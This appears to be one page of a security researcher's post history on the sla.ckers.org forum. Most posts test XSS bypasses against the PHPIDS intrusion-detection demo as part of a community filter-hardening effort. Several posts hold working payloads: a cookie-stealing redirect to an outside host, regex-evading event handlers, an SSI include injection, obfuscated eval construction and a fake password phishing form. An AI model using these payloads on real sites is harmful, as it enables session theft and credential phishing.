Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Whether this is about ha.ckers.org, sla.ckers.org or some other project you are interested in or want to talk about, throw it in here to get feedback. 

Pages: 123Next
Current Page: 1 of 3
Results 1 - 30 of 71
6 years ago
kishord
@thornmaker: amazing!
Forum: Projects
7 years ago
kishord
Simply amazing...
Forum: Projects
7 years ago
kishord
Now before anyone else submits a vector, I am submitting mine. DEMO
Forum: Projects
7 years ago
kishord
:D
Forum: Projects
7 years ago
kishord
I am trying to break IDS for last couple of days, I was halfway through, and then thornmaker comes up with more vectors, IDS rules become stronger and I have to start again [:D] Unfair isn't it? ;)
Forum: Projects
7 years ago
kishord
Wow!
Forum: Projects
7 years ago
kishord
There should not be only a . after onWAHTEVER (xxtp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie also works) I guess we will need to enumerate all such characters that work. Do u know the list beford?
Forum: Projects
7 years ago
kishord
beford's vector is still not fixed hxxp://phpids.heideri.ch/?test=%23%22+onclick%60=%22location='ht'%2b'tp://google.com/?'%2bdocument.cookie onWAHTEVER.= may be a better way to go.
Forum: Projects
7 years ago
kishord
http://phpids.heideri.ch/?test=%3Ca%20href=javascript:document.write(123);%3ETest%3C/a%3E I have posted this requirement ('javascript:') on the group as well. Thanks,
Forum: Projects
7 years ago
kishord
@RSnake, Is the semicolon vector a cheat sheet candidate? ;)
Forum: Projects
7 years ago
kishord
Are you all right .mario? http://phpids.heideri.ch/?test=%3Ccode%20onmouseover=;;document.write(123)%3Eabcdefghijk%3C/code%3E two semicolons! against this filter rule: (on\w+\s*=.(\w|("|')))
Forum: Projects
7 years ago
kishord
http://phpids.heideri.ch/?test=%3Ccode%20onmouseover=;document.write(123)%3Eabcdefghijk%3C/code%3E Need to change [\s]*=[\s]* thing. It can be bypassed using onmouseover=;f(); I.e. a ;
Forum: Projects
6 years ago
kishord
Sorry guys I have been away for quite a long time. Currently I am doing an internship and hence getting very little time. I would certainly like to join you after the internship gets over after about two months. (I am not good at PHP though :P )
Forum: Projects
6 years ago
kishord
Does it have to do with greedy matching? E.g. if you have string aaaaaa then a* by default will match the whole string. I am not talking about the regex in your code here. Just check if you have any greedy match in regex.
Forum: Projects
6 years ago
kishord
Nice! I have just uploaded the new file. It now contains a grease monkey script. Just install it and load the page containing the first segment in the browser. And it takes care of rest. So you either install fetch.js and bookmarklet or you install this GM script.
Forum: Projects
6 years ago
kishord
yes it is possible but we will need e.g Greasemonkey. I am planning to do that soon. GM script will detect if there is a segment on the page, if yes, it will do what bookmarklet does.
Forum: Projects
6 years ago
kishord
@Malkav: you approach sounds interesting to me. But my real intention was to share files among web users. We will need checksums and hashes so that users will get the right data and attackers will not be able to modify intermediate segments. The first segment would typically come from a trusted source and will contain hash for the whole file.
Forum: Projects
6 years ago
kishord
@fragge Thanks. Filesplit is the utility I used to split the files. You may use something else. As you said, it would be nice to output the segments into the page output. But I was thinking of following: Split file into segments, append the header and trailer to the last segment.. upload it get the URL(this url is added to the second last segment).. then go to the second last segment...... a
Forum: Projects
6 years ago
kishord
@Malkav: I am finding it little hard to understand you. Do you mean that we encrypt and then keep doing that so that key for n+1st seg is encrypted with the nth segment? By "randomly upping" do you mean that the segments are chained in any random order but the order will be restored after decryption? @Martin: "What about expanding it to attempt to locate pre-existing segments
Forum: Projects
6 years ago
kishord
I just finished POC for what I call as web2torrent. User uploads binary data segments on blogs, mailing lists etc. All the data is linked to each other. The tools let you retrieve the files by reading the web pages. An example is also included. Here you go
Forum: Projects
6 years ago
kishord
Link If I mark my videos as private, no one other except my friends should know what I am watching.
Forum: Privacy
7 years ago
kishord
.
Forum: News and Links
7 years ago
kishord
Hi, I could not do much with this xss. But I think at the least you should be able to construct a phishing page with it. E.g about:blank?<form%20action=http://sla.ckers.org/>Please%20Enter%20Your%20Windows%20Password%20to%20continue:%20<input%20type=password%20name=p></form>
Forum: XSS Info
7 years ago
kishord
Try opening a new window instead of opening a new tab (i.e opening a fresh instance of ie).
Forum: XSS Info
7 years ago
kishord
http://wasjournal.blogspot.com/2007/09/ie-home-page-url-resulting-in-xss.html I am not able to exploit it really. Anyone has a clue?
Forum: XSS Info
7 years ago
kishord
Some months ago, I had found a very serious hole in yahoo. I did not go the full disclosure way, but let me tell you, you get nothing better than a 'thank you' email.
Forum: XSS Info
7 years ago
kishord
@Ronald, I said, "YOU INJECT" /a.shtml?a=%3C!--%23include%20virtual%3D%22c.txt%22%20--%3E which is a.shtml?a=<!--#include virtual="c.txt" --> I.e. when injecting you use %23 and not #. The plain text was given to make clear whats being injected :)
Forum: XSS Info
7 years ago
kishord
a=alert a(0) This harmless vector is still alive
Forum: XSS Info
7 years ago
kishord
Wow! That was unexpected and I am speechless!
Forum: XSS Info
7 years ago
kishord
@Mario Hi, Here is an explanation of the vector: evil=/ev/.source+/al/.source //---variable evil now contains string 'eval' changeProto=/Strin/.source+ /g.prototyp/.source+ /e.ss=/.source+ /Strin/.source+ /g.prototyp/.source+ /e.substrin/.source+ /g/.source; //--- changeProto now contains string 'String.prototype.ss=String.prototype.substring' // Thus now ss i
Forum: XSS Info
Pages: 123Next
Current Page: 1 of 3